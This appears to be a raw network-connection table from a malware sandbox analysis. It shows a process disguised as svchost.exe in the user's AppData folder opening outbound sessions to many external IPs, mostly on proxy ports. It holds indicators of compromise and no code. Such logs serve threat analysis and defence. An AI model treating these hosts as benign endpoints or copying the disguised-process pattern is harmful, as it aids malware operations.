4370	192.168.2.5	63576	45.117.179.179	17827	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4371	192.168.2.5	63563	47.106.112.207	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4372	192.168.2.5	61941	203.76.121.237	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4373	192.168.2.5	62012	185.217.136.67	1337	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4374	192.168.2.5	63564	183.215.23.242	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4375	192.168.2.5	63342	161.97.163.52	45725	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4376	192.168.2.5	63626	23.152.40.14	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4377	192.168.2.5	63616	92.204.135.203	29212	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4378	192.168.2.5	63595	139.129.162.65	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4379	192.168.2.5	63493	117.160.250.133	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4380	192.168.2.5	63593	187.40.1.122	128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4381	192.168.2.5	63668	172.67.231.3	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4382	192.168.2.5	63613	185.81.153.162	3389	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4383	192.168.2.5	63683	45.14.174.148	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4384	192.168.2.5	63628	39.108.229.14	8002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4385	192.168.2.5	63640	47.56.110.204	8989	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4386	192.168.2.5	63636	120.77.148.138	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4387	192.168.2.5	63615	89.218.8.152	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4388	192.168.2.5	62126	162.214.102.195	50366	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4389	192.168.2.5	62720	162.240.10.35	50463	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4390	192.168.2.5	63399	190.115.7.141	1982	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4391	192.168.2.5	63689	104.16.230.163	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4392	192.168.2.5	63660	158.255.215.50	16993	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4393	192.168.2.5	63643	185.49.30.5	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4394	192.168.2.5	63700	104.16.105.207	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4395	192.168.2.5	63650	138.36.150.15	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4396	192.168.2.5	63681	167.172.86.46	10471	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4397	192.168.2.5	62075	181.115.200.59	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4398	192.168.2.5	62703	72.195.114.169	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4399	192.168.2.5	63645	43.231.22.229	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4400	192.168.2.5	63422	64.227.106.157	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4401	192.168.2.5	63684	203.218.172.225	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4402	192.168.2.5	62718	201.91.82.155	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4403	192.168.2.5	63410	193.239.56.84	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4404	192.168.2.5	63685	150.109.243.156	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4405	192.168.2.5	62769	138.68.155.22	10760	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4406	192.168.2.5	63671	116.199.168.1	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4407	192.168.2.5	63659	124.163.236.54	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4408	192.168.2.5	63687	115.96.208.124	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4409	192.168.2.5	63703	198.44.255.3	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4410	192.168.2.5	63712	41.111.243.18	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4411	192.168.2.5	63704	187.40.1.123	128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4412	192.168.2.5	63464	107.180.88.41	57642	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4413	192.168.2.5	63715	51.210.223.9	3000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4414	192.168.2.5	63544	107.181.168.145	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4415	192.168.2.5	63634	117.160.250.138	8899	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4416	192.168.2.5	63699	212.108.155.205	9090	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4417	192.168.2.5	62799	92.204.135.203	10824	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4418	192.168.2.5	63472	80.63.84.58	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4419	192.168.2.5	63718	93.90.212.2	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4420	192.168.2.5	63743	51.15.223.24	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4421	192.168.2.5	63520	162.214.164.200	42624	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4422	192.168.2.5	63506	5.161.231.34	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4423	192.168.2.5	63766	162.159.242.158	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4424	192.168.2.5	63719	122.114.232.137	808	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4425	192.168.2.5	63491	20.0.91.150	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4426	192.168.2.5	62901	162.214.225.223	31473	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4427	192.168.2.5	63519	202.61.204.51	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4428	192.168.2.5	63783	104.16.81.76	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4429	192.168.2.5	63755	47.56.110.204	8989	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4430	192.168.2.5	63803	172.67.35.15	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4431	192.168.2.5	63763	35.199.90.225	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4432	192.168.2.5	62707	89.145.162.81	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4433	192.168.2.5	62873	128.199.221.91	58108	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4434	192.168.2.5	63572	213.32.66.64	50163	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4435	192.168.2.5	63801	201.174.239.28	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4436	192.168.2.5	63772	185.49.30.5	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4437	192.168.2.5	63574	39.105.27.30	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4438	192.168.2.5	63775	8.217.143.187	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4439	192.168.2.5	63795	47.243.114.192	8180	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4440	192.168.2.5	63453	198.8.84.3	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4441	192.168.2.5	63785	167.172.86.46	10471	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4442	192.168.2.5	63797	203.218.172.225	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4443	192.168.2.5	63790	8.219.228.100	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4444	192.168.2.5	63773	89.218.8.152	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4445	192.168.2.5	63934	8.213.128.6	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4446	192.168.2.5	63936	8.213.128.6	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4447	192.168.2.5	63937	8.213.128.6	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4448	192.168.2.5	63939	8.213.128.6	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4449	192.168.2.5	63816	35.72.118.126	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4450	192.168.2.5	63804	193.239.56.84	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4451	192.168.2.5	63793	138.36.150.15	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4452	192.168.2.5	63820	121.128.194.154	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4453	192.168.2.5	63867	104.20.24.214	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4454	192.168.2.5	62309	54.36.122.16	29796	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4455	192.168.2.5	63887	159.65.77.168	8585	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4456	192.168.2.5	63874	172.67.253.69	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4457	192.168.2.5	63829	198.44.255.3	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4458	192.168.2.5	63828	63.250.52.10	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4459	192.168.2.5	63919	104.21.102.95	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4460	192.168.2.5	63832	51.210.223.9	3000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4461	192.168.2.5	63625	12.186.205.122	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4462	192.168.2.5	62318	185.189.100.200	11080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4463	192.168.2.5	63821	43.231.22.229	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4464	192.168.2.5	63818	103.153.154.6	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4465	192.168.2.5	63842	84.39.112.144	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4466	192.168.2.5	63945	104.21.6.88	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4467	192.168.2.5	63608	128.199.196.31	38832	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4468	192.168.2.5	63930	162.214.225.223	50753	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4469	192.168.2.5	63903	199.229.254.129	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4470	192.168.2.5	63847	210.4.194.196	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4471	192.168.2.5	63863	8.218.231.62	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4472	192.168.2.5	63975	104.16.213.202	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4473	192.168.2.5	63976	172.67.181.51	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4474	192.168.2.5	63875	211.222.252.187	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4475	192.168.2.5	63644	51.15.139.15	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4476	192.168.2.5	63831	116.199.168.1	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4477	192.168.2.5	63962	35.209.198.222	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4478	192.168.2.5	63987	199.102.104.70	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4479	192.168.2.5	63897	202.83.102.83	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4480	192.168.2.5	63662	209.14.112.2	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4481	192.168.2.5	64021	172.67.182.48	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4482	192.168.2.5	63133	51.79.87.144	54395	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4483	192.168.2.5	63923	144.76.96.180	5566	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4484	192.168.2.5	63037	45.140.189.95	29003	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4485	192.168.2.5	63958	198.105.100.156	6407	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4486	192.168.2.5	63997	201.174.239.28	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4487	192.168.2.5	64004	129.213.150.205	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4488	192.168.2.5	63949	8.222.164.205	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4489	192.168.2.5	63927	93.90.212.2	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4490	192.168.2.5	63925	43.128.107.251	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4491	192.168.2.5	63985	209.97.150.167	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4492	192.168.2.5	63993	162.159.247.57	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4493	192.168.2.5	63977	58.234.116.197	8197	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4494	192.168.2.5	64006	199.58.185.9	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4495	192.168.2.5	64058	104.16.109.207	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4496	192.168.2.5	64063	104.25.114.28	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4497	192.168.2.5	63666	94.20.183.172	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4498	192.168.2.5	63931	54.36.122.16	39713	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4499	192.168.2.5	63996	47.56.110.204	8989	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4500	192.168.2.5	63033	103.140.34.59	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4501	192.168.2.5	63941	5.32.88.130	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4502	192.168.2.5	63163	67.205.162.103	14398	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4503	192.168.2.5	63904	119.39.68.105	2323	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4504	192.168.2.5	64005	190.110.226.162	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4505	192.168.2.5	64016	31.28.4.192	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4506	192.168.2.5	64040	185.220.226.235	808	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4507	192.168.2.5	63180	138.68.155.22	44660	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4508	192.168.2.5	64009	47.100.236.23	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4509	192.168.2.5	63234	162.241.6.97	60651	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4510	192.168.2.5	64042	3.37.125.76	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4511	192.168.2.5	64033	58.20.248.139	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

